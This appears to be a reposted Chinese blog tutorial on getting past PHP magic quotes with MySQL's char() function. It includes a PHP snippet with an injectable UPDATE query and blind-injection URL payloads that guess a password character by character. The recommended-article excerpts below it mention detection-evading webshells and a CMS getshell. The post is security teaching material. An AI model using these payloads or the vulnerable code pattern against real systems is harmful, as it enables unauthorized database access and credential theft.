char函数绕过魔术引号注入

最新推荐文章于 2022-01-15 23:03:09 发布
最新推荐文章于 2022-01-15 23:03:09 发布
阅读量374 收藏
点赞数
文章标签: php 数据库 python
原文链接:http://www.cnblogs.com/xishaonian/p/6377926.html
版权

我目前学习到的绕过魔术引号的几种方法(如果知道还有别的请万望告之):

1.倘若服务端是GBK可以尝试宽字节注入

2.使用char函数绕过魔术引号进行注入

3.同char函数类似的函数,例如bin(转换为2进制),或者oct(转换为8进制)

本篇就是介绍char函数来进行绕过魔术引号来注入。

以下CODE是一个源码案例:

<?php  
$link = mysqli_connect('localhost', 'root', 'root');
mysqli_select_db($link, 'code');

$table = addslashes($_GET['table']);
$sql = "UPDATE `{$table}` 
        SET `username`='admin'
        WHERE id=1";
if(!mysqli_query($link, $sql)) {  
    echo(mysqli_error($link));
}
mysqli_close($link);

Paylaod:

假设:select * from user where username = 'def';

是可以等价于:select * from user where username = char(100,101,102);

那么在注入中自然也是可以如此。

假设一个站:http://www.baidu.com/newinfo.php?id=1

知道了它的列。char结合left函数注入。

http://www.baidu.com/newinfo.php?id=1 and left(password,1)=char(109)

假设第一个真的是等于109那么就返回正确。

当然了可以使用比较运算符来进行猜解。

http://www.baidu.com/newinfo.php?id=1 and left(password,1)>char(100)

然后猜解第二个的时候(假设第一个的char为100)。

http://www.baidu.com/newinfo.php?id=1 and left(password,2)>char(100,80)

表示python不太会玩儿。如果有人写出脚本可以分享来一起学习一下。

 

转载于:https://www.cnblogs.com/xishaonian/p/6377926.html

aiquan9342
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MySQL魔术引号绕过
qq_39654116的博客
01-05 1455
目录绕过魔术引号简介绕过 绕过魔术引号 简介 现在的WEB程序基本都有对SQL注入的全局过滤,运维人员配置PHP环境是一般会开启魔术引号GPC,即magic_quotes_gpc=On的情况下,如果输入的数据有单引号(’)、双引号(”)、反斜线(\)与 NUL(NULL 字符)等字符都会被加上反斜线进行转义处理。不过GPC在PHP5.4版本后就取消了,所以现在一般都用addslashes()函数来代替GPC进行过滤处理。目前用PHP开发的应用一般是MVC的框架模式进行开发,对GET、POST和COOKIE等
宽字节注入——魔术引号绕过
希望我的博客,能帮上你解决学习中工作中所遇到的问题
05-06 2684
宽字节注入 原理:由于魔术引号函数的存在magic_quotes_gpc(开关),会自动在’ “ \等前面加上一个\导致sql语句闭合不了,这时候我们就需要输入一些字符,让数据库实现误判,让转义字符\和我们输入的语句组成一个新的汉字来闭合语句。 靶场地址 第一题: 首先先在url栏输入’ and 1=2 %23 发现页面并没有变化,可能存在魔术引号,于是我在’前面添加一个%df重新输入代码 %df...
过狗菜刀原理以及绕过魔术引号的配置
dfdhxb995397的博客
08-22 340
本文作者:i春秋签约作家——凉风 首先感谢@我是salf给我的灵感 我之前发了一个帖子:过了D盾扫描的一句话木马。 里面分析了一句话木马的原理,以及过狗、D盾的木马的编写。 传送门: https://bbs.ichunqiu.com/thread-25644-1-1.html tips:下文需要知道一句话木马的原理,可看上面说的帖子 tips...
mysql 绕过addslashes_魔术引号、addslashes和mysql_real_escape_string的防御以及绕过
weixin_39598501的博客
01-19 1091
0x00:php内置过滤函数php有内置的函数用来防御***,简单的介绍几个函数魔术引号当打开时,所有的 '(单引号),"(双引号),\(反斜线)和 NULL 字符都会被自动加上一个反斜线进行转义。这和 addslashes() 作用完全相同。一共有三个魔术引号指令:magic_quotes_gpc 影响到 HTTP 请求数据(GET,POST 和 COOKIE)。不能在运行时改变。在 PHP ...
php绕过魔术引号,PHP魔术引号导致IE XSS Filter bypass
weixin_42390525的博客
03-20 239
PHP魔术引号导致IE XSS Filter bypass作者/xxx首发/Insight-labs.org在一些web容器中会对一些特殊字符做转换处理,这中间ie xss filter开发人员任何地方对它的了解有疏忽,都很可能导致bypass.在php中,如果开启了”魔术引号”特性(magic_quotes_gpc = On),则‘ (single-quote), “ (double quote...
Oracle to_char函数的使用方法
12-16
Oracle to_char函数的功能是将数值型或者日期型转化为字符型,下面就为您详细介绍Oracle to_char函数的使用,希望对您能有所帮助。 Postgres 格式化函数提供一套有效的工具用于把各种数据类型(日期/时间,int,...
oracle to_char函数将number转成string
09-10
Oracle的`to_char`函数是数据库中非常重要的一个转换函数,它允许我们将数值或日期类型的数据转换成格式化的字符串。这个函数在数据处理、报告生成和界面展示等场景中经常被用到,因为它能让我们根据需求自定义数字...
vbs中char()函数对应字符清单
最新发布
10-24
vbs中char()函数对应的字符清单
php绕过魔术引号,php魔术引号安全问题实例分析
weixin_32163411的博客
03-20 489
php通过提取魔术引号产生的“”字符会带来一定的安全问题。例如,以下代码中:代码示例:// foo.php?xigr='ryatfunction daddslashes($string, $force = 0) {!defined('MAGIC_QUOTES_GPC') && define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc());if...
WEB安全 魔术引号注入类型
weixin_30556959的博客
11-27 156
一、魔术引号 1. magic_quotes_gpc 变量 什么是魔术引号 Warning本特性已自 PHP 5.3.0 起废弃并将自 PHP 5.4.0 起移除。当打开时,所有的 '(单引号),"(双引号),\(反斜线)和 NULL 字符都会被自动加上一个反斜线进行转义。这和 addslashes() 作用完全相同。 一共有三个魔术引号指令: magic_quotes_gp...
mysql_char ctf_buuctf_sql注入_随便注1
weixin_34299849的博客
02-10 273
题目:随便注1知识点:渗透相关知识:1.堆叠注入2.猜解查询语句3.闭合sql语句的测试方法常规的sql语句:1.desc table:显示表结构2.show tables/show tables:显示所有表预处理语句:1.set 变量名=xxx:创建变量2.concat():可以拼接绕过字符过滤,执行sql方法,制造出目标的字符串3.prepare 语句名=字符串名:预处理,字符串赋值给语句并执...
魔术引号与递归转义
一个优秀的程序员的逻辑运算能力是长期以来所形成的~是经历过大量编码的洗礼,是一个程序员是否优秀的标准
12-17 334
$arr = array(1,2,3,4); // 用foreach来处理$arr foreach($arr as $k=>$v) {     $arr[$k] = 2 * $v; } print_r($arr); */ // 回到$_POST上来,要循环对POST做转义 $_POST = array('age'=>28,'name'=>'abc"'); foreach($_
2-3字符类基础与注入基础
山兔的博客
01-15 445
在mysql的数据类型里面,使用的最广泛,也是最常用的类型,就是字符类型,也正是因为如此,字符类型在注入攻击中也是最常用的,发挥最好的一种 1.字符类型 字符类型包括:char(固定长度字符串),varchar(可变长度字符串),binary(固定长度二进制字符串),varbinary(可变长度二进制字符串),blob(相对应保存二进制字符串类型),text(相对应保存明文的字符串,相当于文本),enum(枚举类型),set(集合类型) 接下来,通过实际的操作,给大家看一下,这些字符串类型是如何使用的 我们
关于一个sql注入注入题目的思考
arthur2612的博客
02-13 147
作者:niexinming @n0tr00t p牛在群里面出了一个好玩的题目,正好晚上空虚寂寞冷,就做一下暖暖身子,题目是: <?php $link = mysqli_connect('localhost', 'root', 'root'); mysqli_select_db($link, 'code'); $table = addslashes($_GET['table']...
魔术引号、addslashes和mysql_real_escape_string的防御以及绕过
weixin_33972649的博客
06-02 365
0x00:php内置过滤函数php有内置的函数用来防御***,简单的介绍几个函数魔术引号当打开时,所有的 '(单引号),"(双引号),\(反斜线)和 NULL 字符都会被自动加上一个反斜线进行转义。这和 addslashes() 作用完全相同。一共有三个魔术引号指令:magic_quotes_gpc 影响到 HTTP 请求数据(GET,POST 和 COOKIE)。不能在运...
记一次小网站渗透过程
Delity的博客
04-21 8605
一、序言 记录某一次无意点开的一个小网站的渗透过程,幸运的是搭建平台是phpstudy,cms是beecms,beecms有通用漏洞,然后去网上找了资料,成功getshell并获取服务器权限。 二、渗透过程 无意点开一个网站,发现网站比较小,且看起来比较老,然后发现logo没有改,于是乎去百度搜索这个cms,发现有通用漏洞,这里贴一个链接:Beecms 通用漏洞 这里运气比较好,没有更改后台地...
在SQL注入中常用的mysql语法
孤的博客
10-29 890
user()返回当前数据库连接使用的用户; database()返回当前数据库连接使用的数据库; version()返回当前数据库的版本; concat-ws() 函数可以将这些函数进行组合使用并显示出来。concat函数中,将其中的参数直接连接起来产生新的字符串。而在concat_ws函数中,第一个参数是用于作为分隔符将后面各个参数的内容分隔开来再进行相应的连接产生新的字符串。 concat_w...
《WEB安全渗透测试》(11)SQL注入绕过
午夜安全
10-24 1264
《WEB安全渗透测试》(11)SQL注入绕过 当我们访问如下URL的时候,提示“存在非法字符”:http://www.tianchi.com/web/rg/1.php?id=1 order by 3可以尝试Order,同理如果其他字符必拦截,也可以大小写混合。当我们遇到关键字必过滤的时候,如我们访问如下URL:http://www.tianchi.com/web/rg/1.php?id=1 order by 3...
strstr函数绕过
10-09
对于绕过`strstr`函数的方法,可以使用自定义的字符串匹配函数来实现类似的功能。以下是一个用于匹配字符串的简单示例代码: ```c #include int custom_strstr(const char* haystack, const char* needle) { for...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值